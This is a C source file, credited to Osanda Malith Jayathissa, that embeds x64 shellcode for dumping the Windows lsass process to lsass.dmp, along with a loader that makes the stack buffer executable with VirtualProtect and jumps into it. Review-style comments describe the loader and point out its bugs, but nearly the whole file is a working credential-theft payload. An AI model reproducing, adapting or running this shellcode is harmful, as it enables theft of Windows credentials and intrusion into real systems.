
# include <stdlib.h>
# include <stdio.h>
# include <string.h>
# include <windows.h>
/*
* Title: Shellcode to dump the lsass process - Windows 10 - Server 2019.
* Author: Osanda Malith Jayathissa (@OsandaMalith)
* Website: https://osandamalith.com
*/
/*
 * Entry point of a self-contained loader: the byte string below lives in a
 * stack array, the page(s) holding it are switched to PAGE_EXECUTE_READWRITE
 * with VirtualProtect, control is transferred into the array through a
 * function-pointer cast, and the previous protection is restored afterwards.
 *
 * Exit status is the only interface: EXIT_FAILURE when the first
 * VirtualProtect call fails (the buffer is then never executed), EXIT_SUCCESS
 * otherwise.
 *
 * NOTE(review): making a stack buffer writable and executable at the same time
 * and then calling into it is exactly the behaviour that API-hooking and
 * memory-scanning defences key on; nothing here attempts to avoid that, and the
 * embedded bytes themselves are not annotated in this file.
 */
int main() {
/* Opaque machine code stored as a string literal; it contains embedded \x00
 * bytes (the fourth byte is one), so C string functions see only a prefix. */
char shellcode[] =
"\xE9\x3B\x03\x00\x00\xCC\xCC\xCC\x48\x89\x5C\x24\x08\x48\x89\x74"
"\x24\x10\x57\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00"
"\x8B\xF1\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41\x30\x4D\x85"
"\xC0\x0F\x84\xB8\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C"
"\x4D\x8B\x09\x42\x8B\x9C\x00\x88\x00\x00\x00\x33\xD2\xF3\x0F\x7F"
"\x04\x24\x85\xDB\x74\xD4\x48\x8B\x04\x24\x48\xC1\xE8\x10\x44\x0F"
"\xB7\xD0\x45\x85\xD2\x74\x20\x48\x8B\x4C\x24\x08\x45\x8B\xDA\xC1"
"\xCA\x0D\x80\x39\x61\x0F\xBE\x01\x7C\x03\x83\xC2\xE0\x03\xD0\x48"
"\xFF\xC1\x49\xFF\xCB\x75\xE8\x4D\x8D\x14\x18\x33\xC9\x41\x8B\x7A"
"\x20\x49\x03\xF8\x41\x39\x4A\x18\x76\x90\x8B\x1F\x45\x33\xDB\x48"
"\x8D\x7F\x04\x49\x03\xD8\x41\xC1\xCB\x0D\x0F\xBE\x03\x48\xFF\xC3"
"\x44\x03\xD8\x80\x7B\xFF\x00\x75\xED\x41\x8D\x04\x13\x3B\xC6\x74"
"\x0D\xFF\xC1\x41\x3B\x4A\x18\x72\xD1\xE9\x5C\xFF\xFF\xFF\x41\x8B"
"\x42\x24\x03\xC9\x49\x03\xC0\x0F\xB7\x04\x01\x41\x8B\x4A\x1C\xC1"
"\xE0\x02\x48\x98\x49\x03\xC0\x8B\x04\x01\x49\x03\xC0\xEB\x02\x33"
"\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x74\x24\x28\x48\x83\xC4\x10\x5F"
"\xC3\xCC\xCC\xCC\x40\x55\x53\x56\x57\x41\x54\x41\x55\x41\x56\x41"
"\x57\x48\x8D\xAC\x24\x18\xFF\xFF\xFF\x48\x81\xEC\xE8\x01\x00\x00"
"\x33\xC0\x48\x8D\x7D\xB0\xB9\x30\x01\x00\x00\xF3\xAA\x45\x33\xF6"
"\xB9\x4C\x77\x26\x07\xC7\x45\x90\x6B\x65\x72\x6E\xC7\x45\x94\x65"
"\x6C\x33\x32\xC7\x45\x98\x2E\x64\x6C\x6C\x44\x88\x75\x9C\xC7\x44"
"\x24\x70\x64\x62\x67\x68\xC7\x44\x24\x74\x65\x6C\x70\x2E\xC7\x44"
"\x24\x78\x64\x6C\x6C\x00\xC7\x45\x80\x64\x62\x67\x63\xC7\x45\x84"
"\x6F\x72\x65\x2E\xC7\x45\x88\x64\x6C\x6C\x00\xC7\x44\x24\x60\x6E"
"\x74\x64\x6C\xC7\x44\x24\x64\x6C\x2E\x64\x6C\x66\xC7\x44\x24\x68"
"\x6C\x00\xC7\x44\x24\x50\x6C\x73\x61\x73\xC7\x44\x24\x54\x73\x2E"
"\x64\x6D\x66\xC7\x44\x24\x58\x70\x00\xC7\x44\x24\x40\x6C\x73\x61"
"\x73\xC7\x44\x24\x44\x73\x2E\x65\x78\x66\xC7\x44\x24\x48\x65\x00"
"\xC6\x85\x30\x01\x00\x00\x61\xE8\x3C\xFE\xFF\xFF\x48\x8D\x4D\x90"
"\x48\x8B\xF8\xFF\xD7\x48\x8D\x4C\x24\x70\xFF\xD7\x48\x8D\x4D\x80"
"\xFF\xD7\x48\x8D\x4C\x24\x60\xFF\xD7\xB9\x80\x39\x1E\x92\xE8\x15"
"\xFE\xFF\xFF\xB9\xDA\xF6\xDA\x4F\x48\x8B\xF0\xE8\x08\xFE\xFF\xFF"
"\xB9\x27\xA9\xE8\x67\x48\x8B\xF8\xE8\xFB\xFD\xFF\xFF\xB9\x8D\x52"
"\x01\xBD\x48\x8B\xD8\xE8\xEE\xFD\xFF\xFF\xB9\x74\x71\x8D\xDC\x4C"
"\x8B\xE0\xE8\xE1\xFD\xFF\xFF\xB9\xB4\x73\x8D\xE2\x4C\x8B\xF8\xE8"
"\xD4\xFD\xFF\xFF\xB9\xEE\x95\xB6\x50\x4C\x8B\xE8\xE8\xC7\xFD\xFF"
"\xFF\xB9\x3D\xD7\xC8\x6E\x48\x89\x85\x40\x01\x00\x00\xE8\xB6\xFD"
"\xFF\xFF\xB9\x7A\x19\x77\x6A\x48\x89\x45\xA0\xE8\xA8\xFD\xFF\xFF"
"\x4C\x8D\x8D\x38\x01\x00\x00\x41\x8D\x4E\x14\x45\x33\xC0\xB2\x01"
"\xFF\xD0\x4C\x21\x74\x24\x30\x48\x8D\x4C\x24\x50\x45\x33\xC9\x45"
"\x33\xC0\xBA\x00\x00\x00\x10\xC7\x44\x24\x28\x80\x00\x00\x00\xC7"
"\x44\x24\x20\x02\x00\x00\x00\xFF\xD7\x33\xD2\x48\x89\x85\x48\x01"
"\x00\x00\x8D\x4A\x02\xFF\xD6\xC7\x45\xB0\x30\x01\x00\x00\x48\x8B"
"\xF8\x48\x8D\x55\xB0\x48\x8B\xC8\xFF\xD3\x33\xDB\x85\xC0\x74\x31"
"\xEB\x1C\x48\x8D\x55\xB0\x48\x8B\xCF\x41\xFF\xD4\x48\x8D\x55\xDC"
"\x48\x8D\x8D\x30\x01\x00\x00\x41\xFF\xD5\x44\x8B\x75\xB8\x48\x8D"
"\x54\x24\x40\x48\x8D\x8D\x30\x01\x00\x00\x41\xFF\xD7\x85\xC0\x75"
"\xD1\x45\x8B\xC6\x33\xD2\xB9\xFF\xFF\x1F\x00\xFF\x95\x40\x01\x00"
"\x00\x4C\x8B\x85\x48\x01\x00\x00\x48\x89\x5C\x24\x30\x48\x8B\xC8"
"\x41\xB9\x02\x00\x00\x00\x41\x8B\xD6\x48\x89\x5C\x24\x28\x48\x89"
"\x5C\x24\x20\xFF\x55\xA0\x48\x81\xC4\xE8\x01\x00\x00\x41\x5F\x41"
"\x5E\x41\x5D\x41\x5C\x5F\x5E\x5B\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC"
"\x56\x48\x8B\xF4\x48\x83\xE4\xF0\x48\x83\xEC\x20\xE8\xB3\xFD\xFF"
"\xFF\x48\x8B\xE6\x5E\xC3";
/* Receives the page protection that was in force before the change. */
DWORD oldProtect;
/* NOTE(review): strlen() counts only the bytes before the first \x00 in the
 * literal, so the value printed is not the array size. Passing a size_t to
 * %d is also a format/argument mismatch (undefined behaviour in C11; %zu is
 * the matching conversion). */
wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
/* Same strlen() value as above sizes the region; the request is for memory
 * that is writable and executable at once (PAGE_EXECUTE_READWRITE). */
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
if (!ret) {
/* Generic message only; GetLastError() is not reported. */
fprintf(stderr, "%s", "Error Occured");
return EXIT_FAILURE;
}
/* Transfers control into the stack array. Whether control comes back depends
 * on the embedded bytes; the literal ends in \xC3 (ret), which suggests it
 * does, but that is not verified here. */
((void(*)(void))shellcode)();
/* Restores the saved protection; this call's return value is not checked. */
VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
return EXIT_SUCCESS;
}